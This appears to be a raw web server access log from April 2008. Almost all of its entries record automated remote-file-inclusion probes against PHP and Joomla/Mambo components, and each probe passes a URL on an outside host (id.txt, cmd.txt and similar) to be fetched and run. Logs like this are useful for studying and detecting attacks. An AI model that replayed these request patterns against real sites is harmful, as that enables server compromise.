72.30.216.102 - - [20/Apr/2008:22:00:17 -0600] "GET /logs/access_log.20080203 HTTP/1.0" 404 218 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
222.255.3.68 - - [20/Apr/2008:22:02:35 -0600] "GET //?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 200 698 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.255.3.68 - - [20/Apr/2008:22:02:35 -0600] "GET /logs//?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 200 1740 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
85.25.149.38 - - [20/Apr/2008:22:05:08 -0600] "GET /logs/error_log/index.php?include_dir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
85.25.149.38 - - [20/Apr/2008:22:05:08 -0600] "GET /index.php?include_dir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
85.25.149.38 - - [20/Apr/2008:22:05:09 -0600] "GET /logs/index.php?include_dir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
72.3.238.151 - - [20/Apr/2008:22:05:20 -0600] "GET /logs/access_log.20080224/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
72.3.238.151 - - [20/Apr/2008:22:05:20 -0600] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
72.3.238.151 - - [20/Apr/2008:22:05:21 -0600] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
202.190.76.246 - - [20/Apr/2008:22:11:12 -0600] "GET /logs/error_log.20080330///////////index2.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
202.190.76.246 - - [20/Apr/2008:22:11:13 -0600] "GET ///////////index2.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
202.190.76.246 - - [20/Apr/2008:22:11:14 -0600] "GET /logs///////////index2.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
72.29.70.163 - - [20/Apr/2008:22:12:44 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.utviklingsstudier.org//modules/12-cmd.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
69.20.9.225 - - [20/Apr/2008:22:15:14 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/l33t1/1337.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.65"
69.20.9.225 - - [20/Apr/2008:22:15:14 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/l33t1/1337.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
213.246.51.45 - - [20/Apr/2008:22:15:32 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
213.246.51.45 - - [20/Apr/2008:22:15:32 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
69.20.9.225 - - [20/Apr/2008:22:16:54 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/l33t1/1337.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.65"
69.20.9.225 - - [20/Apr/2008:22:16:54 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/l33t1/1337.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
72.3.238.151 - - [20/Apr/2008:22:17:23 -0600] "GET /logs/error_log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
67.195.37.95 - - [20/Apr/2008:22:18:18 -0600] "GET /logs/error_log HTTP/1.0" 200 70603 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.227.99.192 - - [20/Apr/2008:22:19:33 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=U'R%20AttackeR?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
212.227.99.192 - - [20/Apr/2008:22:19:39 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=U'R%20AttackeR?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
207.234.130.193 - - [20/Apr/2008:22:27:12 -0600] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
207.234.130.193 - - [20/Apr/2008:22:27:12 -0600] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
72.29.70.163 - - [20/Apr/2008:22:28:04 -0600] "GET /logs/error_log.20080330//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.utviklingsstudier.org//modules/12-cmd.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.810"
72.29.70.163 - - [20/Apr/2008:22:28:04 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.utviklingsstudier.org//modules/12-cmd.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
72.29.70.163 - - [20/Apr/2008:22:28:05 -0600] "GET /logs/access_log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.utviklingsstudier.org//modules/12-cmd.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.810"
217.172.175.130 - - [20/Apr/2008:22:28:35 -0600] "GET /logs/access_log//include.php?path[docroot]=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
217.172.175.130 - - [20/Apr/2008:22:28:35 -0600] "GET /logs/access_log//include.php?path[docroot]=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
217.172.175.130 - - [20/Apr/2008:22:28:36 -0600] "GET //include.php?path[docroot]=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 230 "-" "libwww-perl/5.69"
217.172.175.130 - - [20/Apr/2008:22:28:36 -0600] "GET //include.php?path[docroot]=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 230 "-" "libwww-perl/5.69"
87.253.132.5 - - [20/Apr/2008:22:29:08 -0600] "GET /logs/access_log//include.php?path[docroot]=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
87.253.132.5 - - [20/Apr/2008:22:29:08 -0600] "GET //include.php?path[docroot]=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
87.253.132.5 - - [20/Apr/2008:22:30:06 -0600] "GET /logs/access_log//include.php?path[docroot]=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
87.253.132.5 - - [20/Apr/2008:22:30:06 -0600] "GET //include.php?path[docroot]=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
217.172.175.130 - - [20/Apr/2008:22:31:25 -0600] "GET /logs/error_log.20080406//include.php?path[docroot]=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 242 "-" "libwww-perl/5.69"
217.172.175.130 - - [20/Apr/2008:22:31:39 -0600] "GET /logs/error_log.20080406//include.php?path[docroot]=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 242 "-" "libwww-perl/5.69"
87.253.132.5 - - [20/Apr/2008:22:32:32 -0600] "GET /logs/error_log.20080406//include.php?path[docroot]=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
85.114.130.19 - - [20/Apr/2008:22:32:41 -0600] "GET /logs/access_log.20080224/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 286 "-" "libwww-perl/5.805"
85.114.130.19 - - [20/Apr/2008:22:32:41 -0600] "GET /logs/access_log.20080224/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 286 "-" "libwww-perl/5.805"
85.114.130.19 - - [20/Apr/2008:22:32:49 -0600] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
85.114.130.19 - - [20/Apr/2008:22:32:49 -0600] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
80.67.26.157 - - [20/Apr/2008:22:32:55 -0600] "GET /admin/inc/change_action.php?format_menue=http://www.walex.ch/templates/madeyourweb/.../robot.txt?? HTTP/1.1" 404 233 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
80.67.26.157 - - [20/Apr/2008:22:32:55 -0600] "GET /logs/admin/inc/change_action.php?format_menue=http://www.walex.ch/templates/madeyourweb/.../robot.txt?? HTTP/1.1" 404 238 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
85.114.130.19 - - [20/Apr/2008:22:32:57 -0600] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
85.114.130.19 - - [20/Apr/2008:22:32:57 -0600] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
204.15.10.228 - - [20/Apr/2008:22:33:16 -0600] "GET /logs/error_log.20080330//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.810"
204.15.10.228 - - [20/Apr/2008:22:33:16 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.810"
204.15.10.228 - - [20/Apr/2008:22:33:16 -0600] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.810"
87.253.132.5 - - [20/Apr/2008:22:33:22 -0600] "GET /logs/error_log.20080406//include.php?path[docroot]=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
72.10.167.50 - - [20/Apr/2008:22:33:26 -0600] "GET /logs/contenido/includes/include.lay_subnav.php?cfg[path][contenido]=http://www.ptrmania.p2pforum.it//media/bo.do?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
72.10.167.50 - - [20/Apr/2008:22:33:26 -0600] "GET /contenido/includes/include.lay_subnav.php?cfg[path][contenido]=http://www.ptrmania.p2pforum.it//media/bo.do?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.230.241.240 - - [20/Apr/2008:22:35:10 -0600] "GET /logs/error_log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
69.20.9.225 - - [20/Apr/2008:22:37:41 -0600] "GET /logs/access_log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/l33t1/1337.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.65"
69.20.9.225 - - [20/Apr/2008:22:37:42 -0600] "GET /logs/error_log.20080406/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/l33t1/1337.txt? HTTP/1.1" 404 298 "-" "libwww-perl/5.65"
207.58.138.166 - - [20/Apr/2008:22:40:22 -0600] "GET /logs/access_log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://energotechnology.com/templates/madeyourweb/css/temp1.txt????? HTTP/1.1" 404 278 "-" "libwww-perl/5.811"
207.58.138.166 - - [20/Apr/2008:22:40:22 -0600] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://energotechnology.com/templates/madeyourweb/css/temp1.txt????? HTTP/1.1" 404 262 "-" "libwww-perl/5.811"
207.58.138.166 - - [20/Apr/2008:22:40:22 -0600] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://energotechnology.com/templates/madeyourweb/css/temp1.txt????? HTTP/1.1" 404 267 "-" "libwww-perl/5.811"
85.25.149.38 - - [20/Apr/2008:22:41:34 -0600] "GET /logs/error_log//modules/xfsection/modify.php?dir_module=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
85.25.149.38 - - [20/Apr/2008:22:41:35 -0600] "GET //modules/xfsection/modify.php?dir_module=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
85.25.149.38 - - [20/Apr/2008:22:41:35 -0600] "GET /logs//modules/xfsection/modify.php?dir_module=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
204.15.120.73 - - [20/Apr/2008:22:44:25 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://iulian.pokol.hu/id3.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
204.15.120.73 - - [20/Apr/2008:22:44:25 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://iulian.pokol.hu/id3.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
85.25.149.38 - - [20/Apr/2008:22:44:53 -0600] "GET /logs/access_log//modules/xfsection/modify.php?dir_module=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
200.159.108.202 - - [20/Apr/2008:22:45:41 -0600] "GET /logs/error_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
202.190.76.246 - - [20/Apr/2008:22:45:45 -0600] "GET /logs/access_log.20080330///////////index2.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
200.159.108.202 - - [20/Apr/2008:22:45:46 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
200.159.108.202 - - [20/Apr/2008:22:45:48 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
217.172.175.130 - - [20/Apr/2008:22:46:01 -0600] "GET /logs/error_log.20080406//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 279 "-" "libwww-perl/5.69"
217.172.175.130 - - [20/Apr/2008:22:46:01 -0600] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 255 "-" "libwww-perl/5.69"
80.67.26.157 - - [20/Apr/2008:22:46:09 -0600] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.walex.ch/templates/madeyourweb/.../robot.txt?? HTTP/1.1" 404 255 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
80.67.26.157 - - [20/Apr/2008:22:46:09 -0600] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.walex.ch/templates/madeyourweb/.../robot.txt?? HTTP/1.1" 404 260 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
80.67.26.157 - - [20/Apr/2008:22:46:42 -0600] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.walex.ch/templates/madeyourweb/.../robot.txt?? HTTP/1.1" 404 260 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
80.67.26.157 - - [20/Apr/2008:22:46:42 -0600] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.walex.ch/templates/madeyourweb/.../robot.txt?? HTTP/1.1" 404 255 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
87.253.132.5 - - [20/Apr/2008:22:47:58 -0600] "GET /logs/error_log.20080406//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
87.253.132.5 - - [20/Apr/2008:22:47:59 -0600] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
193.34.150.208 - - [20/Apr/2008:22:48:04 -0600] "GET /errors.php?error=http://www.mazaklaser.be/administrator/modules/mambo?? HTTP/1.1" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
193.34.150.208 - - [20/Apr/2008:22:48:04 -0600] "GET /logs/errors.php?error=http://www.mazaklaser.be/administrator/modules/mambo?? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
200.159.108.202 - - [20/Apr/2008:22:53:57 -0600] "GET /logs/access_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
204.15.120.73 - - [20/Apr/2008:22:56:54 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://geocities.com/kumpulan_surat_sephani/jabodetabek.txt????? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
204.15.120.73 - - [20/Apr/2008:22:56:54 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://geocities.com/kumpulan_surat_sephani/jabodetabek.txt????? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
204.15.120.73 - - [20/Apr/2008:22:57:30 -0600] "GET /logs//include/logout.php?PSA_PATH=http://geocities.com/kumpulan_surat_sephani/jabodetabek.txt????? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
204.15.120.73 - - [20/Apr/2008:22:57:30 -0600] "GET //include/logout.php?PSA_PATH=http://geocities.com/kumpulan_surat_sephani/jabodetabek.txt????? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
72.51.46.161 - - [20/Apr/2008:22:58:01 -0600] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
72.51.46.161 - - [20/Apr/2008:22:58:01 -0600] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.811"
89.218.85.18 - - [20/Apr/2008:22:58:28 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
89.218.85.18 - - [20/Apr/2008:22:58:28 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
89.218.85.18 - - [20/Apr/2008:22:58:29 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
89.218.85.18 - - [20/Apr/2008:22:58:29 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
83.230.241.240 - - [20/Apr/2008:22:58:45 -0600] "GET /logs/access_log.20080224/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
83.230.241.240 - - [20/Apr/2008:22:58:46 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
83.230.241.240 - - [20/Apr/2008:22:58:47 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
74.55.6.34 - - [20/Apr/2008:22:58:57 -0600] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=U'R%20AttackeR?? HTTP/1.1" 404 249 "-" "libwww-perl/5.810"
74.55.6.34 - - [20/Apr/2008:22:58:57 -0600] "GET //templates/mangobery/footer.sample.php?Site_Path=U'R%20AttackeR?? HTTP/1.1" 404 244 "-" "libwww-perl/5.810"
204.15.120.73 - - [20/Apr/2008:23:01:06 -0600] "GET /logs//include/logout.php?PSA_PATH=http://www.nfrmag.com/rss/member.jpg?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
204.15.120.73 - - [20/Apr/2008:23:01:06 -0600] "GET //include/logout.php?PSA_PATH=http://www.nfrmag.com/rss/member.jpg?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
70.86.236.106 - - [20/Apr/2008:23:04:45 -0600] "GET /errors.php?error=http://www.geocities.com/elmaalia/famili.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.810"
213.246.51.45 - - [20/Apr/2008:23:06:41 -0600] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
213.246.51.45 - - [20/Apr/2008:23:06:41 -0600] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
209.47.165.69 - - [20/Apr/2008:23:07:42 -0600] "GET /logs/error_log.20080406//newspublish/include.php?path%5Bdocroot%5D=http://www.sacredword.net/docs/arab.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
209.47.165.69 - - [20/Apr/2008:23:07:42 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.sacredword.net/docs/arab.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.810"
209.47.165.69 - - [20/Apr/2008:23:07:42 -0600] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.sacredword.net/docs/arab.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
209.47.165.69 - - [20/Apr/2008:23:07:44 -0600] "GET /logs/access_log//newspublish/include.php?path%5Bdocroot%5D=http://www.sacredword.net/docs/arab.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.810"
85.114.130.19 - - [20/Apr/2008:23:08:48 -0600] "GET /logs/access_log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
85.114.130.19 - - [20/Apr/2008:23:08:48 -0600] "GET /logs/access_log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
85.114.130.19 - - [20/Apr/2008:23:08:56 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
85.114.130.19 - - [20/Apr/2008:23:08:57 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
85.114.130.19 - - [20/Apr/2008:23:09:05 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
85.114.130.19 - - [20/Apr/2008:23:09:05 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
196.4.80.161 - - [20/Apr/2008:23:15:15 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://iulian.pokol.hu/on.txt??????? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
196.4.80.161 - - [20/Apr/2008:23:15:16 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://iulian.pokol.hu/on.txt??????? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
67.19.105.42 - - [20/Apr/2008:23:16:38 -0600] "GET /logs/errors.php?error=http://www.geocities.com/elmaalia/famili.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
67.19.105.42 - - [20/Apr/2008:23:16:38 -0600] "GET /errors.php?error=http://www.geocities.com/elmaalia/famili.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.811"
209.61.244.6 - - [20/Apr/2008:23:17:56 -0600] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.trosken.com/test.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
209.61.244.6 - - [20/Apr/2008:23:17:58 -0600] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.trosken.com/test.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
70.86.236.106 - - [20/Apr/2008:23:18:53 -0600] "GET /logs/access_log.20080224/errors.php?error=http://www.geocities.com/elmaalia/famili.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
70.86.236.106 - - [20/Apr/2008:23:18:53 -0600] "GET /logs/errors.php?error=http://www.geocities.com/elmaalia/famili.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
195.19.33.141 - - [20/Apr/2008:23:22:27 -0600] "GET /logs/access_log/index.php?body=http://suwarjono.net/scan/id2.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
195.19.33.141 - - [20/Apr/2008:23:22:27 -0600] "GET /index.php?body=http://suwarjono.net/scan/id2.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
195.19.33.141 - - [20/Apr/2008:23:22:28 -0600] "GET /logs/index.php?body=http://suwarjono.net/scan/id2.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
209.61.244.6 - - [20/Apr/2008:23:23:17 -0600] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.trosken.com/test.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
209.61.244.6 - - [20/Apr/2008:23:23:18 -0600] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.trosken.com/test.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
